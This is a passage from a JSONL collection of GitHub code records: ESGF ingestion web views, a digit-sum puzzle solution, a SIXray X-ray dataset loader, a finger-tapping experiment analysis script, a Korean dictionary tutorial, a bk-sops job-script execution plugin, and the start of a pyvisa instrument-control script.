{}\n for f in facets_data:\n fname = f.get('name')\n fvalue = f.get('value')\n submission_facets[fname] = fvalue\n\n project = submission_facets['project']\n if project is None:\n return {'status': 'Error', 'message': 'Missing the \"project\" facet'}\n\n cert = crypto.load_certificate(crypto.FILETYPE_PEM, publisher.x509_pem)\n if not authentication.is_publisher(openid, cert, group=project, roles=['publisher']):\n return {'Error': '%s does not have the publisher role in the %s project' % (openid, project)}\n\n\n for fname in submission_facets:\n fvalue = submission_facets[fname]\n facet_name = DBSession.query(FacetName).filter(FacetName.name==fname).first()\n if facet_name is None:\n return { 'status': 'Error', 'message': \"Unknown facet name: '%s'\" % fname }\n facet_name = DBSession.query(FacetName).filter(FacetName.name==fname).first()\n facet_value = DBSession.query(FacetValue).filter(FacetValue.name_id==facet_name.id).filter(FacetValue.value==fvalue).first()\n if facet_value is None:\n facet_value = FacetValue(facet_name=facet_name, value=fvalue)\n sfacet = SubmissionFacet()\n facet_value.submission_facet.append(sfacet)\n submission.submission_facet.append(sfacet)\n\n return {'status': 'Success', 'submission_id': submission.id, 'message': 'The publication workflow has been created successfully'}\n\n\n@view_config(route_name='workflow_transfer', renderer='json', permission='publish')\ndef workflow_transfer(request):\n\n openid = request.authenticated_userid\n submission_id = request.matchdict['workflow_id']\n if request.method != 'POST':\n return HttpResponse('Error:')\n data = json.loads(request.body.decode('utf-8'))\n\n endpoint = data.get('endpoint')\n path = data.get('path')\n access_token = data.get('access_token')\n\n submission = DBSession.query(Submission).filter(Submission.id==submission_id).first()\n if submission is None:\n return {'status': 'Error', 'message': 'Wrong submission id: %s' % submission_id }\n\n if submission.task_id is not None:\n ar = result.AsyncResult(id=submission.task_id, app=celery_app)\n if ar.state != 'SUCCESS' and ar.state != 'FAILURE':\n return {'status': 'Running', 'message': 'Another task, %s, is still running' % submission.task_name }\n\n metadata = DBSession.query(SubmissionMetadata).\\\n filter(SubmissionMetadata.submission_id==submission_id).\\\n filter(SubmissionMetadata.name=='datanode').first()\n\n\n ar = transfer.delay(openid=openid, datanode=metadata.value, submission_id='%s' % submission.id)\n submission.task_id = ar.id\n submission.task_name = 'transfer'\n if path:\n submission.path = path\n\n return {'status': 'Success', 'message': 'Scan task %s started successfully' % ar.id }\n\n\n@view_config(route_name='workflow_scan', renderer='json', permission='publish')\ndef workflow_scan(request):\n\n openid = request.authenticated_userid\n submission_id = request.matchdict['workflow_id']\n if request.method != 'POST':\n return HttpResponse('Error:')\n data = json.loads(request.body.decode('utf-8'))\n\n path = data.get('path')\n\n\n submission = DBSession.query(Submission).filter(Submission.id==submission_id).first()\n if submission is None:\n return {'status': 'Error', 'message': 'Wrong submission id: %s' % submission_id }\n\n if submission.task_id is not None:\n ar = result.AsyncResult(id=submission.task_id, app=celery_app)\n if ar.state != 'SUCCESS' and ar.state != 'FAILURE':\n return {'status': 'Running', 'message': 'Another task, %s, is still running' % submission.task_name }\n\n metadata = DBSession.query(SubmissionMetadata).\\\n filter(SubmissionMetadata.submission_id==submission_id).\\\n filter(SubmissionMetadata.name=='datanode').first()\n\n facets = DBSession.query(FacetName, FacetValue, SubmissionFacet).\\\n filter(FacetName.id==FacetValue.name_id).\\\n filter(FacetValue.id==SubmissionFacet.value_id).\\\n filter(SubmissionFacet.submission_id==submission_id).order_by(FacetName.id).all()\n\n # Start a scan process for the specified workflow and facets\n fnv = []\n for fname, fvalue, sfacet in facets:\n fnv.append({ 'name': fname.name, 'value': fvalue.value })\n log.info('%d: %s:%s' % (submission.id, fname.name, fvalue.value))\n\n ar = scan.delay(openid=openid, submission_id='%s' % submission.id, facets=fnv, path=path)\n submission.task_id = ar.id\n submission.task_name = 'scan'\n if path:\n submission.path = path\n\n return {'status': 'Success', 'message': 'Scan task %s started successfully' % ar.id }\n\n\n@view_config(route_name='workflow_publish', renderer='json', permission='publish')\ndef workflow_publish(request):\n\n openid = request.authenticated_userid\n (server, username) = utils.decompose_openid(openid)\n\n submission_id = request.matchdict['workflow_id']\n\n submission = DBSession.query(Submission).filter(Submission.id==submission_id).first()\n if submission is None:\n return {'status': 'Error', 'message': 'Wrong submission id: %s' % submission_id }\n\n if submission.task_id is not None:\n ar = result.AsyncResult(id=submission.task_id, app=celery_app)\n if ar.state != 'SUCCESS' and ar.state != 'FAILURE':\n return {'status': 'Running', 'message': 'Another task, %s, is still running' % submission.task_name }\n\n metadata = DBSession.query(SubmissionMetadata).\\\n filter(SubmissionMetadata.submission_id==submission_id).\\\n filter(SubmissionMetadata.name=='datanode').first()\n\n ar = publish.delay(openid=openid, datanode=metadata.value, submission_id='%s' % submission.id, path=submission.path)\n submission.task_id = ar.id\n submission.task_name = 'publish'\n\n return {'status': 'Success', 'message': 'Publish task %s started successfully' % ar.id }\n\n\n@view_config(route_name='workflow_status', renderer='json', permission='publish')\ndef workflow_status(request):\n submission_id = request.matchdict['workflow_id']\n\n submission = DBSession.query(Submission).filter(Submission.id==submission_id).first()\n if submission is None:\n return {'status': 'Error', 'message': 'Wrong submission id: %s' % submission_id }\n\n if submission.task_id is None:\n return { 'status': 'Error', 'message': 'No task has been submitted yet' }\n\n ar = result.AsyncResult(id=submission.task_id, app=celery_app)\n if ar.state != 'SUCCESS' and ar.state != 'FAILURE':\n return {'status': 'Running', 'message': 'Task %s is still running' % submission.task_name }\n\n r = ar.get()\n return r\n\n\n","repo_name":"lukaszlacinski/esgf-ingestion","sub_path":"ingestion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37329440630","text":"num = int(input())\nstart = num - (len(str(num)) * 9)\nstart = 1 if start < 1 else start\n\nans = 0\nfor i in range(start, num+1):\n res = sum(map(int, str(i)))\n if num == (i + res):\n ans = i\n break\nprint(ans)\n","repo_name":"choiyezz/BOJ","sub_path":"Bronze2/B2_2231.py","file_name":"B2_2231.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13514445650","text":"import os\nimport torch\nfrom PIL import Image\nfrom xml.etree.ElementTree import parse\nfrom torch.utils.data.dataset import Dataset\nfrom torchvision import transforms\n\nclass sixrayDataset(Dataset):\n CLASS_NAME = ['BACKGROUND','Gun', 'Knife', 'Wrench', 'Pliers', 'Scissors', 'Hammer']\n def __init__(self, sixray_folder, mode):\n self.sixray_folder = sixray_folder\n self.mode = mode # 'train' or 'eval'\n\n self.image_folder = os.path.join(self.sixray_folder, self.mode, 'image')\n self.annotation_folder = os.path.join(self.sixray_folder, self.mode, 'annotation')\n\n self.transform = transforms.Compose([\n transforms.ToTensor(),\n ])\n\n def __len__(self):\n return len(os.listdir(self.annotation_folder))\n \n def __getitem__(self, index):\n annotation_file_name = os.listdir(self.annotation_folder)[index]\n annotation_file = os.path.join(self.annotation_folder, annotation_file_name)\n\n tree = parse(annotation_file)\n root = tree.getroot()\n \n # image info\n image_filename = root.findtext(\"filename\")\n image_width = root.find('size').findtext('width')\n image_height = root.find('size').findtext('height')\n \n image_file = os.path.join(self.image_folder, image_filename)\n image = Image.open(image_file).convert(\"RGB\")\n image = self.transform(image)\n\n # object info \n objs = root.findall('object')\n boxes = []\n for obj in objs :\n obj_name = obj.findtext('name')\n if obj_name == None : continue \n obj_index = sixrayDataset.CLASS_NAME.index(obj_name)\n \n x1 = float(obj.find('bndbox').findtext('xmin'))\n y1 = float(obj.find('bndbox').findtext('ymin'))\n x2 = float(obj.find('bndbox').findtext('xmax'))\n y2 = float(obj.find('bndbox').findtext('ymax'))\n box = [x1, y1, x2, y2]\n \n boxes.append([obj_index, box])\n \n # boxes = torch.as_tensor(boxes, dtype=torch.float32)\n \n image_id = int(image_filename[1:].split('.jpg')[0]) # Only use for evaluate \n\n return image, boxes, image_id","repo_name":"JungminChung/fasterRCNN","sub_path":"datasets/SIXray.py","file_name":"SIXray.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29419170139","text":"\n#### Evaluate the Accuracy of the preferred period calculations\n\n##############################\n### Imports\n###############################\n\n# Warning Supression\nimport warnings\nwarnings.simplefilter(\"ignore\")\n\n# Standard I/O and Data Handling\nimport pandas as pd\nimport numpy as np\nimport os, glob, sys\nimport datetime\nimport copy\nimport pickle\n\n# Data Loading\nfrom scripts.libraries.helpers import load_pickle, dump_pickle, load_tapping_data\n\n# Detection\nfrom scripts.libraries.tap_detection import find_taps\n\n# Plotting\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rcParams\n\n###############################\n### Plot Helpers\n###############################\n\n## Plotting Variables\nstandard_fig = (10,5.8)\nplot_dir = \"./plots/\"\nrcParams[\"errorbar.capsize\"] = 5\n\n###############################\n### General Helpers\n###############################\n\n## Bootstrapped Confidence Interval\ndef bootstrap_ci(values,\n alpha = 0.05,\n func = np.mean,\n sample_percent = 70,\n samples = 100,\n replace = False):\n processed_vals = []\n values = np.array(values)\n for sample in range(samples):\n sample_vals = np.random.choice(values, int(values.shape[0] * sample_percent/100.), replace = replace)\n processed_vals.append(func(sample_vals))\n return np.percentile(processed_vals, [alpha*100/2, 50, 100. - (alpha*100/2)])\n\n###############################\n### Load Data\n###############################\n\n# Main Data Directory\ndata_dir = \"./data/\"\n\n# Tapping Data Directory\ntapping_data_dir = data_dir + \"tapping/\"\n\n# Tapping Filenames\ntapping_filenames = glob.glob(tapping_data_dir + \"*/*\")\ntapping_filenames = [tapping_filenames[i] for i in np.argsort([int(t.split(\"/\")[-1].replace(\".mat\",\"\")) for t in tapping_filenames])]\n\n# Load all data into memory\ntapping_data = {}\nfor subject_file in tapping_filenames:\n ## Extract subject ID from the filename\n subject_id = int(subject_file.split(\"/\")[-1].replace(\".mat\",\"\"))\n ## Load data and add to cache\n subject_data = load_tapping_data(subject_file)\n ## Get Preferred Period Calibration Signal and Estimated PP\n pref_force = subject_data[\"preferred_force\"]\n pref_period_calc = subject_data[\"preferred_period_online\"]\n ## Cache\n tapping_data[subject_id] = {\"data\":pref_force, \"preferred_period\":pref_period_calc}\n\n## Load Merged Results to See Which Subjects Were Kept\nresults_df = pd.read_csv(\"./data/processed_results.csv\")\n\n###############################\n### Calculations\n###############################\n\n# Store for processed taps\ncache_file = \"./data/preferred_periods.pickle\"\nprocessed_taps = {}\nif os.path.exists(cache_file):\n processed_taps = load_pickle(cache_file)\n\n# Process\nfor subject, data in tapping_data.items():\n\n if subject in processed_taps:\n continue\n\n ## Estimate Taps\n est_taps = find_taps(data[\"data\"],\n expected_intertapinterval = 1000)\n\n # Note the starting number of taps\n starting_tap_init_length = len(est_taps)\n\n # Interactive Removal Procedure\n filtering_complete = False\n while not filtering_complete:\n\n # Define function to manually remove identified taps\n def onclick(event):\n global ix, iy\n ix, iy = event.xdata, event.ydata\n # assign global variable to access outside of function\n global coords\n coords.append((ix, iy))\n # Disconnect after 2 clicks\n if len(coords) == 2:\n fig.canvas.mpl_disconnect(cid)\n plt.close(1)\n\n # Separate by condition and compute ITIs\n itis = np.diff(est_taps)\n\n # Create Plot\n fig, ax = plt.subplots(2,1, sharex = False, figsize = (14,6))\n ax[0].plot(data[\"data\"])\n ax[0].vlines(est_taps, ax[0].get_ylim()[0]-0.05, ax[0].get_ylim()[1],\n color = \"red\", linewidth = .75, linestyle = \"--\")\n t1 = ax[1].plot(np.arange(len(itis)), itis)\n t2 = ax[1].scatter(np.arange(len(itis)), itis, color = \"red\", s = 20, marker = \"o\")\n ax[1].axvline(len(itis) - .5, color = \"black\", linestyle = \"--\")\n fig.tight_layout()\n\n # Interact with Plot and Store Chosen Coordinates\n coords = []\n cid = fig.canvas.mpl_connect('button_press_event', onclick)\n plt.show(1)\n\n # Remove taps within selected interval\n start_len, end_len = 0, 0\n if len(coords) > 1:\n cmin, cmax = coords[0][0], coords[1][0]\n start_len = len(est_taps)\n est_taps = est_taps[np.logical_not((est_taps >= cmin ) & (est_taps <= cmax))]\n end_len = len(est_taps)\n else:\n filtering_complete = True\n continue\n\n # Check for continuation\n if start_len == end_len:\n filtering_complete = True\n else:\n keep_filtering = input(\"Continue filtering? \")\n if len(keep_filtering) == 0:\n filtering_complete = True\n\n # Discard Check\n final_check = \"\"\n filtered_original = False\n if starting_tap_init_length != len(est_taps):\n\n # Flag to note that taps were filtered\n filtered_original = True\n\n # Show Final Result\n fig, ax = plt.subplots(figsize=(12,6))\n ax.plot(data[\"data\"])\n ax.vlines(est_taps, ax.get_ylim()[0], ax.get_ylim()[1], color = \"red\", linewidth = .75, linestyle = \"--\")\n fig.tight_layout()\n plt.show(block=False)\n\n # Ask user to validate final filtering\n final_check = input(\"Discard? If yes, why? \")\n\n # Double check plot is closed\n plt.close(\"all\")\n\n # Save results\n discard_reason = None\n if len(final_check) > 0:\n discard_reason = final_check\n est_taps = None\n processed_taps[subject] = {\"tap_initiations\":est_taps, \"discard_reason\":discard_reason, \"filtered\":filtered_original}\n\n## Dump\ndump_pickle(processed_taps, cache_file)\n\n###############################\n### Comparisons\n###############################\n\n## Extract Preferred Periods\npp_online = pd.DataFrame([[sub, data[\"preferred_period\"]] for sub, data in tapping_data.items()],\n columns = [\"subject\",\"preferred_period_online\"])\n\n## Calculate PP from Tap Initiations\ndef calc_pp(tap_inits,\n sample_rate = 2000,\n **bootstrap_kwargs):\n \"\"\"\n\n \"\"\"\n if tap_inits is None or len(tap_inits) < 3:\n return None, 0, (None,None,None)\n tap_mask = np.logical_and(tap_inits >= 5 * sample_rate, tap_inits <= 15 * sample_rate)\n tap_mask = np.nonzero(tap_mask)[0]\n if len(tap_mask) == 1:\n return None, 0, (None,None,None)\n tap_diffs = np.diff(tap_inits[tap_mask])\n pp = np.mean(tap_diffs) / sample_rate\n conf_int = bootstrap_ci(tap_diffs / sample_rate, **bootstrap_kwargs)\n return pp, len(tap_mask), tuple(conf_int)\n\n## Execute Calculation\npp_online[\"pp_stats\"] = pp_online.subject.map(lambda i: calc_pp(processed_taps[i][\"tap_initiations\"]))\nfor c, col in enumerate([\"preferred_period_offline\",\"offline_iti_count\",\"pp_confidence_interval\"]):\n pp_online[col] = pp_online[\"pp_stats\"].map(lambda i: i[c])\npp_online.drop([\"pp_stats\"],axis=1,inplace=True)\n\n## Add flag to note whether the subject was kept in the final analysis\npp_online[\"subject_kept\"] = pp_online.subject.isin(results_df.subject)\n\n## Correlation\nkept_corr = pp_online.loc[pp_online.subject_kept].drop([\"subject\",\"subject_kept\",\"offline_iti_count\",\"pp_confidence_interval\"],axis=1).corr()\ndiscarded_corr = pp_online.loc[~pp_online.subject_kept].drop([\"subject\",\"subject_kept\",\"offline_iti_count\",\"pp_confidence_interval\"],axis=1).corr()\n\n## Difference\npp_online[\"calculation_difference\"] = pp_online[\"preferred_period_online\"] - pp_online[\"preferred_period_offline\"]\n\n## Plot Correlation\nfig, ax = plt.subplots()\npp_online.loc[pp_online.subject_kept].plot.scatter(\"preferred_period_online\",\n \"preferred_period_offline\",\n ax = ax,\n label = \"Kept (Pearson $r = {:,.3f}$)\".format(kept_corr.values[1,0]),\n color = \"C0\")\npp_online.loc[~pp_online.subject_kept].plot.scatter(\"preferred_period_online\",\n \"preferred_period_offline\",\n ax = ax,\n label = \"Discarded (Pearson $r = {:,.3f}$)\".format(discarded_corr.values[1,0]),\n color = \"C1\")\nplt.plot([ax.get_xlim()[0], ax.get_xlim()[1]],\n [ax.get_xlim()[0], ax.get_xlim()[1]],\n color = \"black\",\n alpha = .3,\n linestyle = \"--\")\nplt.xlabel(\"Online Calculation (s)\")\nplt.ylabel(\"Offline Calculation (s)\")\nplt.legend(loc = \"upper left\", frameon=False)\nplt.tight_layout()\nplt.savefig(\"./plots/methodology/preferred_period_scatter_comparison.png\")\nplt.close()\n\n## Histogram of Differences\nfig, ax = plt.subplots()\npp_online.calculation_difference.hist(bins = 50, ax = ax, zorder = 5)\nax.set_xlabel(\"Online Calculation minus Offiline Calculation (s)\")\nax.set_ylabel(\"# of Subjects\")\nplt.tight_layout()\nplt.savefig(\"./plots/methodology/preferred_period_online_offline_difference_histogram.png\")\nplt.close()\n\n## Number of Recognized ITIs vs. PP\nfig, ax = plt.subplots()\npp_online.loc[pp_online.subject_kept].plot.scatter(\"offline_iti_count\",\n \"preferred_period_offline\",\n ax=ax,\n label = \"Kept\",\n color = \"C0\")\npp_online.loc[~pp_online.subject_kept].plot.scatter(\"offline_iti_count\",\n \"preferred_period_offline\",\n ax=ax,\n label = \"Discarded\",\n color = \"C1\")\n\nplt.show()\n\n## Calculate Whether Subject's Online Period Fell within Bootstrapped Range\nin_range = lambda row: row[\"preferred_period_online\"] <= row[\"pp_confidence_interval\"][2] and \\\n row[\"preferred_period_online\"] >= row[\"pp_confidence_interval\"][0] if \\\n (not pd.isnull(row[\"preferred_period_online\"]) and \\\n not any(i is None for i in row[\"pp_confidence_interval\"])) else \\\n False\npp_online[\"online_in_range\"] = pp_online.apply(in_range, axis = 1)\n\n## Within Variation Range (Preferred Period Confidence Interval)\nconf_ints = pp_online.sort_values(\"preferred_period_online\").dropna().pp_confidence_interval.values\nonline_calc = pp_online.sort_values(\"preferred_period_online\").dropna().preferred_period_online.values\nfig, ax = plt.subplots()\nfor i, (val_conf, val_online) in enumerate(zip(conf_ints, online_calc)):\n ax.vlines(i, val_conf[0], val_conf[2], color = \"C0\")\n ax.scatter(i,\n val_online,\n color = \"black\" if val_online <= val_conf[2] and val_online >= val_conf[0] else \"red\",\n s = 10,\n zorder = 10)\nplt.show()\n\n###############################\n### Subject-Filtering\n###############################\n\n\"\"\"\nSubjects whom were given trials based on a preferred period online\ncalculation that differed substantially from the offline calculation\nare flagged for removal here (since their data might not represent\nnormal behavior)\n\"\"\"\n\n## Calculate Absolute Difference (Relative to Offline Calculation)\npp_online[\"rel_difference\"] = (pp_online[\"calculation_difference\"] / pp_online[\"preferred_period_offline\"]) * 100\npp_online[\"absolute_rel_difference\"] = np.abs(pp_online[\"rel_difference\"])\n\n## Difference Cumulative Distribution\naxes = pp_online.hist(\"absolute_rel_difference\",\n by = \"subject_kept\",\n cumulative = True,\n bins = list(np.arange(0,101)) + [pp_online.absolute_rel_difference.max() +1],\n histtype = \"step\")\naxes[0].set_title(\"Subjects Discarded Already\")\naxes[1].set_title(\"Subjects Currently Kept\")\nfor a in axes:\n a.set_xlabel(\"Relative Difference Threshold\")\n a.set_ylabel(\"# Subjects After Removal\")\nplt.show()\n\n## Boundaries\ndef show_boundaries_at_difference_threshold(threshold,\n show = True):\n \"\"\"\n Create a scatter plot of online/offline preferred period calculations. Show\n filtering boundary and compute the number of subjects removed under a given\n threshold\n\n Args:\n threshold (numeric): Percentage (100 scale) to use for relative absolute difference\n show (bool): If True, show the plot. Otherwise, return the figure\n\n Returns:\n None or fig, ax combo (depending on the `show` parameter)\n \"\"\"\n fig, ax = plt.subplots()\n ax.scatter(pp_online.loc[pp_online.subject_kept][\"preferred_period_offline\"],\n pp_online.loc[pp_online.subject_kept][\"preferred_period_online\"],\n s = 50,\n alpha = .3,\n color = \"C0\",\n label = \"Currently Kept\")\n ax.scatter(pp_online.loc[~pp_online.subject_kept][\"preferred_period_offline\"],\n pp_online.loc[~pp_online.subject_kept][\"preferred_period_online\"],\n s = 50,\n alpha = .3,\n color = \"C1\",\n label = \"Currently Discarded\")\n xlim = list(ax.get_xlim())\n ax.plot(xlim,\n xlim,\n color = \"black\",\n alpha = .3,\n linestyle = \"-\",\n label = \"Match\")\n ax.plot(xlim,\n np.array(xlim) * (100 + threshold) / 100.,\n alpha = .3,\n color = \"red\",\n linestyle = \"--\")\n ax.plot(xlim,\n np.array(xlim) * (100 - threshold) / 100.,\n alpha = .3,\n color = \"red\",\n linestyle = \"--\",\n label = \"Boundary at {}%\".format(threshold))\n ax.legend(loc = \"lower right\", frameon = False, fontsize = 8)\n rem_tot = (pp_online.absolute_rel_difference >= threshold).sum()\n rem_new = (pp_online.loc[pp_online.subject_kept].absolute_rel_difference >= threshold).sum()\n ax.set_title(\"{} Subjects Removed ({} new)\".format(rem_tot, rem_new))\n ax.set_xlabel(\"Offline Preferred Period (s)\")\n ax.set_ylabel(\"Online Preferred Period (s)\")\n fig.tight_layout()\n if show:\n plt.show()\n else:\n return fig, ax\n\n## Plot Filtering\nfig, ax = show_boundaries_at_difference_threshold(5, False)\nfig.savefig(\"./plots/methodology/pp_filtering_boundaries.png\")\nplt.close()\n\n## Create Filter Table Data Cache for `statistical_testing.py` script\nfilter_cache_file_out = \"./data/preferred_period_filtering_map.csv\"\npp_online[[\"subject\",\"rel_difference\",\"absolute_rel_difference\",\"online_in_range\"]].to_csv(filter_cache_file_out,index=False)\n","repo_name":"kharrigian/pitchers-and-pianists","sub_path":"scripts/evaluate_preferred_period_calculations.py","file_name":"evaluate_preferred_period_calculations.py","file_ext":"py","file_size_in_byte":15130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13450238000","text":"# 딕셔너리에 값 추가하기/제거하기\n# dictionary[new key] = new value\ndictionary = {\n \"name\": \"7D 건조 망고\",\n \"type\": \"당절임\",\n \"ingredient\": [\"망고\", \"설탕\", \"메타중아황산나트륨\", \"치자황색소\"],\n \"origin\": \"필리핀\"\n}\ndictionary[\"price\"] = 5000\ndel dictionary[\"ingredient\"]\nprint(dictionary)","repo_name":"shinjian/Study","sub_path":"10_Dictionary/dict03.py","file_name":"dict03.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26527178037","text":"import base64\nfrom functools import partial\n\nfrom django.utils import translation\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom pipeline.core.flow.io import (\n StringItemSchema,\n ObjectItemSchema,\n BooleanItemSchema,\n)\nfrom pipeline.component_framework.component import Component\nfrom pipeline_plugins.components.collections.sites.open.job import JobService\nfrom pipeline_plugins.components.collections.sites.open.job.ipv6_base import GetJobTargetServerMixin\nfrom pipeline_plugins.components.utils import get_job_instance_url, get_node_callback_url\n\nfrom gcloud.conf import settings\nfrom gcloud.constants import JobBizScopeType\nfrom gcloud.utils.handlers import handle_api_error\n\n__group_name__ = _(\"作业平台(JOB)\")\n\nget_client_by_user = settings.ESB_GET_CLIENT_BY_USER\n\njob_handle_api_error = partial(handle_api_error, __group_name__)\n\n\nclass JobFastExecuteScriptService(JobService, GetJobTargetServerMixin):\n need_get_sops_var = True\n\n def inputs_format(self):\n return [\n self.InputItem(\n name=_(\"业务 ID\"),\n key=\"biz_cc_id\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"当前操作所属的 CMDB 业务 ID\")),\n ),\n self.InputItem(\n name=_(\"脚本来源\"),\n key=\"job_script_source\",\n type=\"string\",\n schema=StringItemSchema(\n description=_(\"待执行的脚本来源,手动(manual),业务脚本(general),公共脚本(public)\"),\n enum=[\"manual\", \"general\", \"public\"],\n ),\n ),\n self.InputItem(\n name=_(\"脚本类型\"),\n key=\"job_script_type\",\n type=\"string\",\n schema=StringItemSchema(\n description=_(\"待执行的脚本类型:shell(1) bat(2) perl(3) python(4) powershell(5)\" \",仅在脚本来源为手动时生效\"),\n enum=[\"1\", \"2\", \"3\", \"4\", \"5\"],\n ),\n ),\n self.InputItem(\n name=_(\"脚本内容\"),\n key=\"job_content\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"待执行的脚本内容,仅在脚本来源为手动时生效\")),\n ),\n self.InputItem(\n name=_(\"公共脚本\"),\n key=\"job_script_list_public\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"待执行的公共脚本 ID,仅在脚本来源为公共脚本时生效\")),\n ),\n self.InputItem(\n name=_(\"业务脚本\"),\n key=\"job_script_list_general\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"待执行的业务脚本 ID,仅在脚本来源为业务脚本时生效\")),\n ),\n self.InputItem(\n name=_(\"脚本执行参数\"),\n key=\"job_script_param\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"脚本执行参数\")),\n ),\n self.InputItem(\n name=_(\"目标 IP\"),\n key=\"job_ip_list\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"执行脚本的目标机器 IP,多个用英文逗号 `,` 分隔\")),\n ),\n self.InputItem(\n name=_(\"目标账户\"),\n key=\"job_account\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"执行脚本的目标机器账户\")),\n ),\n self.InputItem(\n name=_(\"IP 存在性校验\"),\n key=\"ip_is_exist\",\n type=\"boolean\",\n schema=BooleanItemSchema(description=_(\"是否做 IP 存在性校验,如果ip校验开关打开,校验通过的ip数量若减少,即返回错误\")),\n ),\n ]\n\n def outputs_format(self):\n return super(JobFastExecuteScriptService, self).outputs_format() + [\n self.OutputItem(\n name=_(\"JOB全局变量\"),\n key=\"log_outputs\",\n type=\"object\",\n schema=ObjectItemSchema(\n description=_(\n \"输出日志中提取的全局变量,日志中形如 key:val 的变量会被提取到 log_outputs['key'] 中,值为 val\"\n ),\n property_schemas={\n \"name\": StringItemSchema(description=_(\"全局变量名称\")),\n \"value\": StringItemSchema(description=_(\"全局变量值\")),\n },\n ),\n ),\n ]\n\n def execute(self, data, parent_data):\n executor = parent_data.get_one_of_inputs(\"executor\")\n client = get_client_by_user(executor)\n ip_is_exist = data.get_one_of_inputs(\"ip_is_exist\")\n\n if parent_data.get_one_of_inputs(\"language\"):\n setattr(client, \"language\", parent_data.get_one_of_inputs(\"language\"))\n translation.activate(parent_data.get_one_of_inputs(\"language\"))\n\n biz_cc_id = data.get_one_of_inputs(\"biz_cc_id\", parent_data.inputs.biz_cc_id)\n original_ip_list = data.get_one_of_inputs(\"job_ip_list\")\n\n clean_result, target_server = self.get_target_server(\n executor, biz_cc_id, data, original_ip_list, self.logger, ip_is_exist\n )\n\n if not clean_result:\n return False\n\n job_kwargs = {\n \"bk_scope_type\": JobBizScopeType.BIZ.value,\n \"bk_scope_id\": str(biz_cc_id),\n \"bk_biz_id\": biz_cc_id,\n \"timeout\": data.get_one_of_inputs(\"job_script_timeout\"),\n \"account_alias\": data.get_one_of_inputs(\"job_account\"),\n \"target_server\": target_server,\n \"callback_url\": get_node_callback_url(self.root_pipeline_id, self.id, getattr(self, \"version\", \"\")),\n }\n\n script_param = str(data.get_one_of_inputs(\"job_script_param\"))\n\n if script_param:\n job_kwargs.update({\"script_param\": base64.b64encode(script_param.encode(\"utf-8\")).decode(\"utf-8\")})\n\n script_source = data.get_one_of_inputs(\"job_script_source\")\n if script_source in [\"general\", \"public\"]:\n job_kwargs.update({\"script_version_id\": data.get_one_of_inputs(\"job_script_list_%s\" % script_source)})\n else:\n job_kwargs.update(\n {\n \"script_language\": data.get_one_of_inputs(\"job_script_type\"),\n \"script_content\": base64.b64encode(data.get_one_of_inputs(\"job_content\").encode(\"utf-8\")).decode(\n \"utf-8\"\n ),\n }\n )\n job_result = client.jobv3.fast_execute_script(job_kwargs)\n self.logger.info(\"job_result: {result}, job_kwargs: {kwargs}\".format(result=job_result, kwargs=job_kwargs))\n if job_result[\"result\"]:\n job_instance_id = job_result[\"data\"][\"job_instance_id\"]\n data.outputs.job_inst_id = job_instance_id\n data.outputs.job_inst_name = job_result[\"data\"][\"job_instance_name\"]\n data.outputs.job_inst_url = get_job_instance_url(biz_cc_id, job_instance_id)\n data.outputs.client = client\n return True\n else:\n message = job_handle_api_error(\"jobv3.fast_execute_script\", job_kwargs, job_result)\n self.logger.error(message)\n data.outputs.ex_data = message\n return False\n\n def schedule(self, data, parent_data, callback_data=None):\n return super(JobFastExecuteScriptService, self).schedule(data, parent_data, callback_data)\n\n\nclass JobFastExecuteScriptComponent(Component):\n name = _(\"快速执行脚本\")\n code = \"job_fast_execute_script\"\n bound_service = JobFastExecuteScriptService\n form = \"%scomponents/atoms/job/job_fast_execute_script.js\" % settings.STATIC_URL\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"pipeline_plugins/components/collections/sites/open/job/fast_execute_script/legacy.py","file_name":"legacy.py","file_ext":"py","file_size_in_byte":8066,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"41100710383","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 5 22:45:52 2021\r\n\r\n@author: sammy\r\n\"\"\"\r\n\r\n\r\nimport pyvisa\r\nimport time\r\nimport numpy as np\r\n\r\ndef open(rm):\r\n srs = rm.open_resource('GPIB0::10::INSTR')\r\n print(srs.query('*IDN?'))\r\n dsp = rm.open_resource('GPIB0::12::INSTR')\r\n print(dsp.query('*IDN?'))\r\n therm = rm.open_resource('GPIB0::13::INSTR')\r\n print(therm.query('*IDN?'))\r\n isou = rm.open_resource('GPIB0::25::INSTR')\r\n isou.read_termination = '\\r'\r\n return srs, dsp, therm, isou\r\n\r\ndef getData(srs, dsp, therm, isou):\r\n srs.clear()\r\n srsR = float(srs.query('OUTP ? 3'))\r\n srsT = float(srs.query('OUTP ? 4'))\r\n \r\n dsp.clear()\r\n DSPstr = dsp.query('MP.')\r\n vals = DSPstr.split(\",\")\r\n dspR = float(vals[0])\r\n dspT = float(vals[1])\r\n \r\n tempA = therm.query('INPUT A:TEMPER?')\r\n \r\n isou.clear()\r\n Inow = isou.query('R0\\r')\r\n istuff = Inow.split(\"R\")\r\n Ival = float(istuff[1])\r\n \r\n retVal = [Ival, tempA, srsR, srsT, dspR, dspT]\r\n return retVal\r\n\r\ndef setMax(isou, maxi):\r\n stri = 'I' + str(maxi) + '\\r'\r\n isou.write(stri)\r\n isou.read()\r\n \r\ndef setSign(isou, booli):\r\n if(booli):\r\n isou.write('P1\\r')\r\n 